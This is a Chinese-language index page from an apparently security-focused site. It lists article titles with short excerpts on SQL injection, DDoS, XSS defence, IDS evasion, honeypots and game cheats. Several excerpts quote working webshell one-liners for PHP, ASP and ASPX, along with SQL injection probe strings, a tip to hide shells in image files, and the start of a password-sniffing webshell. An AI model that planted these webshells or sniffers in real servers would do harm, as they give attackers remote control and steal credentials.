|
 |
網絡游戲安全小議(端游/頁游/手游)
|
|
日期:2013-01-14 10:37:54
點擊:153 評論:0
|
一、網絡游戲安全很有趣 一直很想知道魔獸的游戲安全工程師是如何做游戲安全的,毫無疑問,魔獸是目前最流行的網絡游戲,有著眾多經驗豐富的黑客在利潤驅動的情況下以這款游戲的外掛作弊技術謀生,游戲黑客的作弊技能在《網絡游戲安全解密》這本書里有提到(這是目前為 |
|
 |
Auto pentesting. Nmap, SSLscans, screenshots, amap!
|
|
日期:2012-03-21 11:58:29
點擊:105 評論:0
|
Heres my automated scanning script. Its got a few dependencies but will run with a number of threads and will output to a defined folder. #!/bin/bash #__________________________________________________________ # Author: phillips321 forum.gnacktrack. |
|
 |
淺談新型的sql注入測試
|
|
日期:2012-02-24 12:07:59
點擊:117 評論:0
|
前段時間,幫別人看網站,習慣性的,and 1=1 其實知道這種肯定被過濾,但還是測試了 php+mysql 首先說判斷: Null值相信大家不陌生吧,可這么用: and 1 is null,and 1 is not null 或: and 2=3 其實,很多人習慣性的用=號來判斷了,但是,如: = ,= ,is null,is not nu |
|
 |
淺談Ddos攻擊攻擊與防御
|
|
日期:2012-02-13 12:51:48
點擊:72 評論:0
|
EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2011-2-10 From: http://www.80sec.com/ [ 目錄 ] 一 背景 二 應急響應 三 常見ddos攻擊及防御 四 根源及反擊 五 總結 一 背景 在前幾天,我們運營的某網站遭受了一次ddos攻擊,我們的網站是一個公益性質的 |
|
 |
常見 Webshell 的檢測方法及檢測繞過思路
|
|
日期:2012-02-13 11:04:09
點擊:152 評論:0
|
Webshell的因素 我們從一個最簡單的webshell結構可以看出其基本結構:?php eval($_POST[a]);? 從目前被公布的一句話webshell來看,基本都符合這個結構,即shell的實現需要兩步:數據的傳遞、執行所傳遞的數據。 數據傳遞繞過檢測 對于數據傳遞,我們通常的做法是使用$_ |
|
 |
asp,php,aspx一句話集合
|
|
日期:2012-02-02 09:41:08
點擊:820 評論:0
|
推薦還是把一句話加進圖片里面去。 普通的php一句話:?php @eval($_POST['r00ts']);? 普通的asp一句話:%eval(Request.Item[r00ts],unsafe);% aspx突破一流的: script language=VBScript runat=server dim da set fso=server.createobject(scripting.filesystemobject |
|
 |
Content-Type 防范 XSS 繞過
|
|
日期:2011-08-02 11:39:21
點擊:411 評論:0
|
一、前言 09 年寫過一篇文章:json xss 防范(http://www.woyigui.cn/2009/04/28/json-xss/)。文章描述了控制Content-type類型,用于 json 回調 callback 函數接口(如:http://y.baidu.com/vote/data/detail_vote/290b873e69f2ec33a1e0c9f2?alt=html callback =window |
|
 |
PHP中的密碼學算法及其應用2-對稱密碼算法
|
|
日期:2011-06-13 11:27:59
點擊:158 評論:0
|
Author:fleshwound From:Security Matrix( http://www.smatrix.org ), 轉載請注明出處! ////////////////////////////////////////////////////////////////////////////// 目錄 1.PHP的散列函數及其應用 2.PHP中的對稱密碼算法及其應用 3.PHP的公鑰密碼算法及其應用 / |
|
 |
web sniffer 在線嗅探/online http sniff,還有一個webshell sniffer
|
|
日期:2011-05-27 10:55:52
點擊:1401 評論:0
|
http://web-sniffer.net/ 是在線的web sniff。 還有一個webshell的,放在asp.net的空間,嗅探本服務器的ftp,http,smtp,pop3等密碼 支持.net 2.0,不支持1.0吧(轉的)。 %@ Page Language=C# ValidateRequest=false % %@ Import Namespace=System.Net.Sockets % %@ Imp |
|
 |
利用PHP編程防范XSS跨站腳本攻擊
|
|
日期:2011-05-27 10:52:57
點擊:100 評論:1
|
國內不少論壇都存在跨站腳本漏洞,國外也很多這樣的例子,甚至Google也出現過,不過在12月初時修正了。(編者注:關于跨站腳本漏洞攻擊,讀者可參閱《詳解XSS跨站腳本攻擊》)。跨站攻擊很容易就可以構造,而且非常隱蔽,不易被查覺(通常盜取信息后馬上跳轉回原頁面)。 |
|
 |
Web開發框架安全雜談
|
|
日期:2011-03-16 10:46:56
點擊:116 評論:0
|
Web開發框架安全雜談 EMail: wofeiwo#80sec.com Site: http://www.80sec.com Date: 2011-03-14 From: http://www.80sec.com/ [ 目錄 ] 000 起 001 承 002 轉 003 合 000起 最近框架漏洞頻發,struts任意代碼執行、Django csrf token防御繞過、Cakephp代碼執行等等各大 |
|
 |
記錄一次網站被黑抓馬記
|
|
日期:2011-01-18 09:54:24
點擊:85 評論:0
|
前言: 昨天接到一個朋友的委托,任務是解決網站遇到英文瀏覽器自動跳轉到另一個網站的問題。 背景: 現在的網絡時代,黑客與商業并存的時代。有些人利用入侵技術來達到利益問題,成為網絡中的黑色產業鏈。有人利用入侵掛馬,抓肉雞。有人利用入侵掛鏈,做SEO優化。呵 |
|
 |
從真實故事說起 讀黑客戰術社會工程學
|
|
日期:2010-12-22 09:58:56
點擊:113 評論:0
|
一個真實的故事 幾年前的一個早晨,一群陌生人走進了一家大型遠洋運輸公司并控制了該公司的整個計算機網絡。他們是怎么做到的?是通過從該公司的許多不同的員工那里一點點的獲得幫助來達到目的的。首先,他們在實地踩點的兩天之前已經對該公司進行了研究了解。例如,通 |
|
 |
麻煩的終結者
|
|
日期:2010-12-21 09:23:05
點擊:117 評論:0
|
上次演講的全文出來了,是速記的同學記下來的。原文在 http://www.techweb.com.cn/people/2010-12-05/723950.shtml 但是沒校對過,有很多文字錯誤,語句也不太通順,我把我校對后版本的貼到這里。 因為是給中小網站站長做的介紹性演講,所以談的不是技術細節。 原文 各 |
|
 |
SPIKE與Peach Fuzzer相關知識
|
|
日期:2010-10-25 12:36:26
點擊:1193 評論:0
|
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. 這篇文章將為你討論評估Cisco Web服務安全性的一些方式,有幾種框架和工具在進行這種評估時非常有用,不過不幸的是,有些是私有的、價格昂貴的閉源軟件。可以利用幾種不錯的商用工具執行安全評估 |
|
 |
網絡滲透測試指導手冊
|
|
日期:2010-09-29 15:41:35
點擊:343 評論:0
|
什么是網絡滲透測試?滲透測試是一種最老的評估計算機系統安全性的方法。雖然滲 透測試的主要目標是發現組織中網絡基礎架構的安全漏洞;但是它也可能有許多次要目 標,包括測試組織的安全問題識別和響應能力,測試員工安全知識或測試安全性政策規范 等。本文手冊介紹了 |
|
 |
一句話木馬
|
|
日期:2010-07-28 10:46:50
點擊:11149 評論:1
|
asp一句話木馬 程序代碼 %eval request(sb)% 程序代碼 %execute request(sb)% 程序代碼 %execute(request(sb))% 程序代碼 %execute request(sb)%%'% loop %:% 程序代碼 %'% loop %:%%execute request(sb)% 程序代碼 %execute request(sb)'% loop %:%[code] [code]script |
|
 |
自動化操控虛擬戰爭
|
|
日期:2010-05-13 10:45:01
點擊:178 評論:0
|
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. 簡介 ~~~~~ 本文概述利用內核代碼執行對數字游戲產生的影響,這樣做的理由是如果不掃描內核的話,游戲客戶端無法掃描外掛代碼,所有代碼從進程空間無法獲取,這和通常的外掛制作方法完全不同。 開 |
|
 |
IDS規避與對策
|
|
日期:2010-01-04 11:02:56
點擊:129 評論:0
|
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. ========================================================= 案例1:入侵檢測系統分片重組超時低于受害者分片重組的超時 ========================================================= 攻擊情形: |
|
 |
系統監控:蜜罐分析技術
|
|
日期:2009-12-21 15:06:39
點擊:131 評論:0
|
Copyright (c) 2009 Czy Invicta Hack01@Live!cn All rights reserved. 前言 ~~~~~~~~ 本文我將要討論的是對一個被入侵的系統進行逐步地研究,而工具和入侵技術不作為重點。我們將集中精力討論如何把信息拼揍在一起,來分析到底發生了什么事情。我寫這篇文章其目的是幫 |
|
|
 |
|
本月熱點文章 |
|
|
|
 |
|
本月推薦文章 |
|
|
|
 |
|
相關分類 |
|
|
|
|